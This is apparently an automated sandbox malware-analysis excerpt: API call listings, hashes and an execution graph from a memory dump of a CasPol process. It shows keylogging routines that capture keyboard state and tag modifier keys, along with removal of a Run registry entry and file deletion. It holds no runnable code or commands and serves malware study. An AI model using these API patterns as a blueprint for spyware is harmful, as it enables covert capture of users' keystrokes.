                                                                                                • Opcode Fuzzy Hash: 94d942c2b9cd7cd452367b65107360caec8e392a141153fe325b9bee2a1bda9b
                                                                                                • Instruction Fuzzy Hash: D4F0E9B1B00211ABC715BB65880569EB768EF41369F01827FB416772E1CFBD5D04975C
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                  • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,00475108), ref: 00409B3F
                                                                                                  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                  • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,00475108), ref: 00409B67
                                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047515C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                • String ID: [AltL]$[AltR]
                                                                                                • API String ID: 2738857842-2658077756
                                                                                                • Opcode ID: 1deea0a1754c58beabcfa893467cad3df36da0ab1922093d88c83ef84dbcd496
                                                                                                • Instruction ID: 4c389cf0edc94a27bb3bc0fddc987b72c0da48b50f0a0a77cbfc03dd010ffeca
                                                                                                • Opcode Fuzzy Hash: 1deea0a1754c58beabcfa893467cad3df36da0ab1922093d88c83ef84dbcd496
                                                                                                • Instruction Fuzzy Hash: 9AE09B2134032117C898323EA91B6EE3A218F82F65B80016FF8427BADADD7D4D5043CF
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00448A35
                                                                                                  • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                                                                  • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                                • String ID: 8@$8@
                                                                                                • API String ID: 1353095263-3408345419
                                                                                                • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                • Instruction ID: 8fe4af4b93ebf6b2b13329648f525de20a5552277f2be9521e73d3219e6c2dc0
                                                                                                • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                • Instruction Fuzzy Hash: 01E092361003059F8720CF6DD400A86B7F4EF95720720852FE89EE3710D731E812CB40
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                • API String ID: 1649606143-2446555240
                                                                                                • Opcode ID: f1664d460506ce6a307028f778898136177a0e582b30a514b3a67480cfc74d29
                                                                                                • Instruction ID: c178b64a75e50e2fccb38c9379e001e6e5e0f6b670105b82eaba8ba361dc1658
                                                                                                • Opcode Fuzzy Hash: f1664d460506ce6a307028f778898136177a0e582b30a514b3a67480cfc74d29
                                                                                                • Instruction Fuzzy Hash: 59E0866170031517C514363DD61B67F39128F41B66F80012FF842A7AC6ED7E8D6423CB
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004752F0,00475308,?,pth_unenc), ref: 00412A60
                                                                                                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412A70
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412A5E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteOpenValue
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                • API String ID: 2654517830-1051519024
                                                                                                • Opcode ID: 3a238ae8f5602ce2402de7cae663a0db3b4178bc362611f3100633d001d48757
                                                                                                • Instruction ID: 27182704b7fa20b5ed2a2764b3d23dc9a6b68b829b0f6622ee10c7d45645f89b
                                                                                                • Opcode Fuzzy Hash: 3a238ae8f5602ce2402de7cae663a0db3b4178bc362611f3100633d001d48757
                                                                                                • Instruction Fuzzy Hash: F1E01270200308BAEF204FA19E06FEB37ACAB40BC9F004169F601F5191EAB6DD54A658
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteDirectoryFileRemove
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3325800564-4028850238
                                                                                                • Opcode ID: dec08f300a5f428fa5c47b7bc45a3e83a5999c060828e280beeb3790875544bf
                                                                                                • Instruction ID: b030a41f26c3d5f2e51690188d4bb45887e11e7cc62b1c698fc8f7347c957287
                                                                                                • Opcode Fuzzy Hash: dec08f300a5f428fa5c47b7bc45a3e83a5999c060828e280beeb3790875544bf
                                                                                                • Instruction Fuzzy Hash: 12E046715116104BC610AB32E845AEBB798AB05306F00446FE8D3B36A1DE38A948CA98
                                                                                                APIs
                                                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1872346434-4028850238
                                                                                                • Opcode ID: 5bb4d910bf534706ca5f2b5d32154bdbdc32722f36a2c9cc9993c004b7262cc3
                                                                                                • Instruction ID: eef26e02e81300ba4c8cf7f61278c3f59c29627b67378ac59a4e73c1cb1fd9d7
                                                                                                • Opcode Fuzzy Hash: 5bb4d910bf534706ca5f2b5d32154bdbdc32722f36a2c9cc9993c004b7262cc3
                                                                                                • Instruction Fuzzy Hash: 24D01234145351AFD7610B60AD19F953F68E705323F108365F428512F1CFB58494AA1C
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FD37
                                                                                                • GetLastError.KERNEL32 ref: 0043FD45
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FDA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: da5cee2afb3fc4b5b183086853f31dabd9e5fae04dd03cb90eeff65bb8952867
                                                                                                • Instruction ID: a8021b2984f9c2011c4d4eba480f75da6e6c35d7fa760b83b06315d7a0ea6bca
                                                                                                • Opcode Fuzzy Hash: da5cee2afb3fc4b5b183086853f31dabd9e5fae04dd03cb90eeff65bb8952867
                                                                                                • Instruction Fuzzy Hash: E1410A30E00246AFCF218F65C84867B7BA5EF09310F14517EFC5A9B2A2DB398D05C759

                                                                                                Execution Graph

                                                                                                Execution Coverage:6.2%
                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:75
                                                                                                execution_graph 40183 441819 40186 430737 40183->40186 40185 441825 40187 430756 40186->40187 40188 43076d 40186->40188 40189 430774 40187->40189 40190 43075f 40187->40190 40188->40185 40201 43034a memcpy 40189->40201 40200 4169a7 11 API calls 40190->40200 40193 4307ce 40194 430819 memset 40193->40194 40202 415b2c 11 API calls 40193->40202 40194->40188 40195 43077e 40195->40188 40195->40193 40198 4307fa 40195->40198 40197 4307e9 40197->40188 40197->40194 40203 4169a7 11 API calls 40198->40203 40200->40188 40201->40195 40202->40197 40203->40188 37540 442ec6 19 API calls 37717 4152c6 malloc 37718 4152e2 37717->37718 37719 4152ef 37717->37719 37721 416760 11 API calls 37719->37721 37721->37718 37722 4466f4 37741 446904 37722->37741 37724 446700 GetModuleHandleA 37727 446710 __set_app_type __p__fmode __p__commode 37724->37727 37726 4467a4 37728 4467ac __setusermatherr 37726->37728 37729 4467b8 37726->37729 37727->37726 37728->37729 37742 4468f0 _controlfp 37729->37742 37731 4467bd _initterm __wgetmainargs _initterm 37732 446810 37731->37732 37733 44681e GetStartupInfoW 37731->37733 37735 446866 GetModuleHandleA 37733->37735 37743 41276d 37735->37743 37739 446896 exit 37740 44689d _cexit 37739->37740 37740->37732 37741->37724 37742->37731 37744 41277d 37743->37744 37786 4044a4 LoadLibraryW 37744->37786 37746 412785 37747 412789 37746->37747 37794 414b81 37746->37794 37747->37739 37747->37740 37750 4127c8 37800 412465 memset ??2@YAPAXI 37750->37800 37752 4127ea 37812 40ac21 37752->37812 37757 412813 37830 40dd07 memset 37757->37830 37758 412827 37835 40db69 memset 37758->37835 37761 412822 37856 4125b6 ??3@YAXPAX 37761->37856 37763 40ada2 _wcsicmp 37764 41283d 37763->37764 37764->37761 37767 412863 CoInitialize 37764->37767 37840 41268e 37764->37840 37860 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37767->37860 37769 41296f 37862 40b633 37769->37862 37774 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37778 412957 CoUninitialize 37774->37778 37783 4128ca 37774->37783 37778->37761 37779 4128d0 TranslateAcceleratorW 37780 412941 GetMessageW 37779->37780 37779->37783 37780->37778 37780->37779 37781 412909 IsDialogMessageW 37781->37780 37781->37783 37782 4128fd IsDialogMessageW 37782->37780 37782->37781 37783->37779 37783->37781 37783->37782 37784 41292b TranslateMessage DispatchMessageW 37783->37784 37785 41291f IsDialogMessageW 37783->37785 37784->37780 37785->37780 37785->37784 37787 4044f7 37786->37787 37788 4044cf GetProcAddress 37786->37788 37792 404507 MessageBoxW 37787->37792 37793 40451e 37787->37793 37789 4044e8 FreeLibrary 37788->37789 37790 4044df 37788->37790 37789->37787 37791 4044f3 37789->37791 37790->37789 37791->37787 37792->37746 37793->37746 37795 414b8a 37794->37795 37796 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37794->37796 37866 40a804 memset 37795->37866 37796->37750 37799 414b9e GetProcAddress 37799->37796 37801 4124e0 37800->37801 37802 412505 ??2@YAPAXI 37801->37802 37803 41251c 37802->37803 37805 412521 37802->37805 37888 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37803->37888 37877 444722 37805->37877 37811 41259b wcscpy 37811->37752 37893 40b1ab free free 37812->37893 37814 40ac5c 37817 40a9ce malloc memcpy free free 37814->37817 37818 40ad4b 37814->37818 37820 40ace7 free 37814->37820 37825 40ad76 37814->37825 37897 40a8d0 37814->37897 37909 4099f4 37814->37909 37817->37814 37818->37825 37917 40a9ce 37818->37917 37820->37814 37824 40a8d0 7 API calls 37824->37825 37894 40aa04 37825->37894 37826 40ada2 37828 40adc9 37826->37828 37829 40adaa 37826->37829 37827 40adb3 _wcsicmp 37827->37828 37827->37829 37828->37757 37828->37758 37829->37827 37829->37828 37922 40dce0 37830->37922 37832 40dd3a GetModuleHandleW 37927 40dba7 37832->37927 37836 40dce0 3 API calls 37835->37836 37837 40db99 37836->37837 37999 40dae1 37837->37999 38013 402f3a 37840->38013 37842 412766 37842->37761 37842->37767 37843 4126d3 _wcsicmp 37844 4126a8 37843->37844 37844->37842 37844->37843 37846 41270a 37844->37846 38047 4125f8 7 API calls 37844->38047 37846->37842 38016 411ac5 37846->38016 37857 4125da 37856->37857 37858 4125f0 37857->37858 37859 4125e6 DeleteObject 37857->37859 37861 40b1ab free free 37858->37861 37859->37858 37860->37774 37861->37769 37863 40b640 37862->37863 37864 40b639 free 37862->37864 37865 40b1ab free free 37863->37865 37864->37863 37865->37747 37867 40a83b GetSystemDirectoryW 37866->37867 37868 40a84c wcscpy 37866->37868 37867->37868 37873 409719 wcslen 37868->37873 37871 40a881 LoadLibraryW 37872 40a886 37871->37872 37872->37796 37872->37799 37874 409724 37873->37874 37875 409739 wcscat LoadLibraryW 37873->37875 37874->37875 37876 40972c wcscat 37874->37876 37875->37871 37875->37872 37876->37875 37878 444732 37877->37878 37879 444728 DeleteObject 37877->37879 37889 409cc3 37878->37889 37879->37878 37881 412551 37882 4010f9 37881->37882 37883 401130 37882->37883 37884 401134 GetModuleHandleW LoadIconW 37883->37884 37885 401107 wcsncat 37883->37885 37886 40a7be 37884->37886 37885->37883 37887 40a7d2 37886->37887 37887->37811 37887->37887 37888->37805 37892 409bfd memset wcscpy 37889->37892 37891 409cdb CreateFontIndirectW 37891->37881 37892->37891 37893->37814 37895 40aa14 37894->37895 37896 40aa0a free 37894->37896 37895->37826 37896->37895 37898 40a8eb 37897->37898 37899 40a8df wcslen 37897->37899 37900 40a906 free 37898->37900 37901 40a90f 37898->37901 37899->37898 37902 40a919 37900->37902 37903 4099f4 3 API calls 37901->37903 37904 40a932 37902->37904 37905 40a929 free 37902->37905 37903->37902 37906 4099f4 3 API calls 37904->37906 37907 40a93e memcpy 37905->37907 37908 40a93d 37906->37908 37907->37814 37908->37907 37910 409a41 37909->37910 37911 4099fb malloc 37909->37911 37910->37814 37913 409a37 37911->37913 37914 409a1c 37911->37914 37913->37814 37915 409a30 free 37914->37915 37916 409a20 memcpy 37914->37916 37915->37913 37916->37915 37918 40a9e7 37917->37918 37919 40a9dc free 37917->37919 37921 4099f4 3 API calls 37918->37921 37920 40a9f2 37919->37920 37920->37824 37921->37920 37946 409bca GetModuleFileNameW 37922->37946 37924 40dce6 wcsrchr 37925 40dcf5 37924->37925 37926 40dcf9 wcscat 37924->37926 37925->37926 37926->37832 37947 44db70 37927->37947 37931 40dbfd 37950 4447d9 37931->37950 37934 40dc34 wcscpy wcscpy 37976 40d6f5 37934->37976 37935 40dc1f wcscpy 37935->37934 37938 40d6f5 3 API calls 37939 40dc73 37938->37939 37940 40d6f5 3 API calls 37939->37940 37941 40dc89 37940->37941 37942 40d6f5 3 API calls 37941->37942 37943 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37942->37943 37982 40da80 37943->37982 37946->37924 37948 40dbb4 memset memset 37947->37948 37949 409bca GetModuleFileNameW 37948->37949 37949->37931 37952 4447f4 37950->37952 37951 40dc1b 37951->37934 37951->37935 37952->37951 37953 444807 ??2@YAPAXI 37952->37953 37954 44481f 37953->37954 37955 444873 _snwprintf 37954->37955 37956 4448ab wcscpy 37954->37956 37989 44474a 8 API calls 37955->37989 37958 4448bb 37956->37958 37990 44474a 8 API calls 37958->37990 37960 4448a7 37960->37956 37960->37958 37961 4448cd 37991 44474a 8 API calls 37961->37991 37963 4448e2 37992 44474a 8 API calls 37963->37992 37965 4448f7 37993 44474a 8 API calls 37965->37993 37967 44490c 37994 44474a 8 API calls 37967->37994 37969 444921 37995 44474a 8 API calls 37969->37995 37971 444936 37996 44474a 8 API calls 37971->37996 37973 44494b 37997 44474a 8 API calls 37973->37997 37975 444960 ??3@YAXPAX 37975->37951 37977 44db70 37976->37977 37978 40d702 memset GetPrivateProfileStringW 37977->37978 37979 40d752 37978->37979 37980 40d75c WritePrivateProfileStringW 37978->37980 37979->37980 37981 40d758 37979->37981 37980->37981 37981->37938 37983 44db70 37982->37983 37984 40da8d memset 37983->37984 37985 40daac LoadStringW 37984->37985 37986 40dac6 37985->37986 37986->37985 37988 40dade 37986->37988 37998 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37986->37998 37988->37761 37989->37960 37990->37961 37991->37963 37992->37965 37993->37967 37994->37969 37995->37971 37996->37973 37997->37975 37998->37986 38009 409b98 GetFileAttributesW 37999->38009 38001 40daea 38002 40db63 38001->38002 38003 40daef wcscpy wcscpy GetPrivateProfileIntW 38001->38003 38002->37763 38010 40d65d GetPrivateProfileStringW 38003->38010 38005 40db3e 38011 40d65d GetPrivateProfileStringW 38005->38011 38007 40db4f 38012 40d65d GetPrivateProfileStringW 38007->38012 38009->38001 38010->38005 38011->38007 38012->38002 38048 40eaff 38013->38048 38017 411ae2 memset 38016->38017 38018 411b8f 38016->38018 38088 409bca GetModuleFileNameW 38017->38088 38030 411a8b 38018->38030 38020 411b0a wcsrchr 38021 411b22 wcscat 38020->38021 38022 411b1f 38020->38022 38089 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38021->38089 38022->38021 38024 411b67 38090 402afb 38024->38090 38028 411b7f 38146 40ea13 SendMessageW memset SendMessageW 38028->38146 38031 402afb 27 API calls 38030->38031 38032 411ac0 38031->38032 38033 4110dc 38032->38033 38034 41113e 38033->38034 38039 4110f0 38033->38039 38171 40969c LoadCursorW SetCursor 38034->38171 38036 411143 38172 4032b4 38036->38172 38190 444a54 38036->38190 38037 4110f7 _wcsicmp 38037->38039 38038 411157 38040 40ada2 _wcsicmp 38038->38040 38039->38034 38039->38037 38193 410c46 10 API calls 38039->38193 38043 411167 38040->38043 38041 4111af 38043->38041 38044 4111a6 qsort 38043->38044 38044->38041 38047->37844 38049 40eb10 38048->38049 38061 40e8e0 38049->38061 38052 40eb6c memcpy memcpy 38056 40ebb7 38052->38056 38053 40ebf2 ??2@YAPAXI ??2@YAPAXI 38055 40ec2e ??2@YAPAXI 38053->38055 38058 40ec65 38053->38058 38054 40d134 16 API calls 38054->38056 38055->38058 38056->38052 38056->38053 38056->38054 38058->38058 38071 40ea7f 38058->38071 38060 402f49 38060->37844 38062 40e8f2 38061->38062 38063 40e8eb ??3@YAXPAX 38061->38063 38064 40e900 38062->38064 38065 40e8f9 ??3@YAXPAX 38062->38065 38063->38062 38066 40e911 38064->38066 38067 40e90a ??3@YAXPAX 38064->38067 38065->38064 38068 40e931 ??2@YAPAXI ??2@YAPAXI 38066->38068 38069 40e921 ??3@YAXPAX 38066->38069 38070 40e92a ??3@YAXPAX 38066->38070 38067->38066 38068->38052 38069->38070 38070->38068 38072 40aa04 free 38071->38072 38073 40ea88 38072->38073 38074 40aa04 free 38073->38074 38075 40ea90 38074->38075 38076 40aa04 free 38075->38076 38077 40ea98 38076->38077 38078 40aa04 free 38077->38078 38079 40eaa0 38078->38079 38080 40a9ce 4 API calls 38079->38080 38081 40eab3 38080->38081 38082 40a9ce 4 API calls 38081->38082 38083 40eabd 38082->38083 38084 40a9ce 4 API calls 38083->38084 38085 40eac7 38084->38085 38086 40a9ce 4 API calls 38085->38086 38087 40ead1 38086->38087 38087->38060 38088->38020 38089->38024 38147 40b2cc 38090->38147 38092 402b0a 38093 40b2cc 27 API calls 38092->38093 38094 402b23 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402b3a 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402b54 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402b6b 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402b82 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402b99 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402bb0 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402bc7 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402bde 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402bf5 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c0c 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402c23 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402c3a 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402c51 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402c68 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402c7f 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402c99 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402cb3 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402cd5 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402cf0 38131->38132 38133 40b2cc 27 API calls 38132->38133 38134 402d0b 38133->38134 38135 40b2cc 27 API calls 38134->38135 38136 402d26 38135->38136 38137 40b2cc 27 API calls 38136->38137 38138 402d3e 38137->38138 38139 40b2cc 27 API calls 38138->38139 38140 402d59 38139->38140 38141 40b2cc 27 API calls 38140->38141 38142 402d78 38141->38142 38143 40b2cc 27 API calls 38142->38143 38144 402d93 38143->38144 38145 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38144->38145 38145->38028 38146->38018 38150 40b58d 38147->38150 38149 40b2d1 38149->38092 38151 40b5a4 GetModuleHandleW FindResourceW 38150->38151 38152 40b62e 38150->38152 38153 40b5c2 LoadResource 38151->38153 38155 40b5e7 38151->38155 38152->38149 38154 40b5d0 SizeofResource LockResource 38153->38154 38153->38155 38154->38155 38155->38152 38163 40afcf 38155->38163 38157 40b608 memcpy 38166 40b4d3 memcpy 38157->38166 38159 40b61e 38167 40b3c1 18 API calls 38159->38167 38161 40b626 38168 40b04b 38161->38168 38164 40b04b ??3@YAXPAX 38163->38164 38165 40afd7 ??2@YAPAXI 38164->38165 38165->38157 38166->38159 38167->38161 38169 40b051 ??3@YAXPAX 38168->38169 38170 40b05f 38168->38170 38169->38170 38170->38152 38171->38036 38173 4032c4 38172->38173 38174 40b633 free 38173->38174 38175 403316 38174->38175 38194 44553b 38175->38194 38179 403480 38392 40368c 15 API calls 38179->38392 38181 403489 38182 40b633 free 38181->38182 38183 403495 38182->38183 38183->38038 38184 4033a9 memset memcpy 38185 4033ec wcscmp 38184->38185 38186 40333c 38184->38186 38185->38186 38186->38179 38186->38184 38186->38185 38390 4028e7 11 API calls 38186->38390 38391 40f508 6 API calls 38186->38391 38188 403421 _wcsicmp 38188->38186 38191 444a64 FreeLibrary 38190->38191 38192 444a83 38190->38192 38191->38192 38192->38038 38193->38039 38195 445548 38194->38195 38196 445599 38195->38196 38393 40c768 38195->38393 38197 4455a8 memset 38196->38197 38340 4457f2 38196->38340 38476 403988 38197->38476 38204 445854 38205 4458aa 38204->38205 38601 403c9c memset memset memset memset memset 38204->38601 38207 44594a 38205->38207 38208 4458bb memset memset 38205->38208 38206 445672 38487 403fbe memset memset memset memset memset 38206->38487 38210 4459ed 38207->38210 38211 44595e memset memset 38207->38211 38213 414c2e 16 API calls 38208->38213 38216 445a00 memset memset 38210->38216 38217 445b22 38210->38217 38218 414c2e 16 API calls 38211->38218 38212 4455e5 38212->38206 38230 44560f 38212->38230 38219 4458f9 38213->38219 38214 44557a 38220 44558c 38214->38220 38673 4136c0 CoTaskMemFree 38214->38673 38624 414c2e 38216->38624 38222 445bca 38217->38222 38223 445b38 memset memset memset 38217->38223 38228 44599c 38218->38228 38229 40b2cc 27 API calls 38219->38229 38460 444b06 38220->38460 38240 445c8b memset memset 38222->38240 38290 445cf0 38222->38290 38235 445bd4 38223->38235 38236 445b98 38223->38236 38224 445849 38689 40b1ab free free 38224->38689 38239 40b2cc 27 API calls 38228->38239 38241 445909 38229->38241 38232 4087b3 338 API calls 38230->38232 38251 445621 38232->38251 38233 445585 38674 41366b FreeLibrary 38233->38674 38234 44589f 38690 40b1ab free free 38234->38690 38248 414c2e 16 API calls 38235->38248 38236->38235 38244 445ba2 38236->38244 38253 4459ac 38239->38253 38242 414c2e 16 API calls 38240->38242 38250 409d1f 6 API calls 38241->38250 38254 445cc9 38242->38254 38762 4099c6 wcslen 38244->38762 38245 4456b2 38677 40b1ab free free 38245->38677 38247 40b2cc 27 API calls 38257 445a4f 38247->38257 38259 445be2 38248->38259 38249 403335 38389 4452e5 45 API calls 38249->38389 38262 445919 38250->38262 38675 4454bf 20 API calls 38251->38675 38252 445823 38252->38224 38270 4087b3 338 API calls 38252->38270 38263 409d1f 6 API calls 38253->38263 38264 409d1f 6 API calls 38254->38264 38255 445879 38255->38234 38274 4087b3 338 API calls 38255->38274 38639 409d1f wcslen wcslen 38257->38639 38268 40b2cc 27 API calls 38259->38268 38260 445d3d 38288 40b2cc 27 API calls 38260->38288 38261 445d88 memset memset memset 38271 414c2e 16 API calls 38261->38271 38691 409b98 GetFileAttributesW 38262->38691 38272 4459bc 38263->38272 38273 445ce1 38264->38273 38265 445bb3 38765 445403 memset 38265->38765 38266 445680 38266->38245 38510 4087b3 memset 38266->38510 38277 445bf3 38268->38277 38270->38252 38280 445dde 38271->38280 38758 409b98 GetFileAttributesW 38272->38758 38782 409b98 GetFileAttributesW 38273->38782 38274->38255 38287 409d1f 6 API calls 38277->38287 38278 445928 38278->38207 38692 40b6ef 38278->38692 38289 40b2cc 27 API calls 38280->38289 38282 4459cb 38282->38210 38299 40b6ef 252 API calls 38282->38299 38286 40b2cc 27 API calls 38292 445a94 38286->38292 38294 445c07 38287->38294 38295 445d54 _wcsicmp 38288->38295 38298 445def 38289->38298 38290->38249 38290->38260 38290->38261 38291 445389 258 API calls 38291->38222 38644 40ae18 38292->38644 38293 44566d 38293->38340 38561 413d4c 38293->38561 38302 445389 258 API calls 38294->38302 38303 445d71 38295->38303 38366 445d67 38295->38366 38297 445665 38676 40b1ab free free 38297->38676 38304 409d1f 6 API calls 38298->38304 38299->38210 38307 445c17 38302->38307 38783 445093 23 API calls 38303->38783 38310 445e03 38304->38310 38306 4456d8 38312 40b2cc 27 API calls 38306->38312 38313 40b2cc 27 API calls 38307->38313 38309 44563c 38309->38297 38315 4087b3 338 API calls 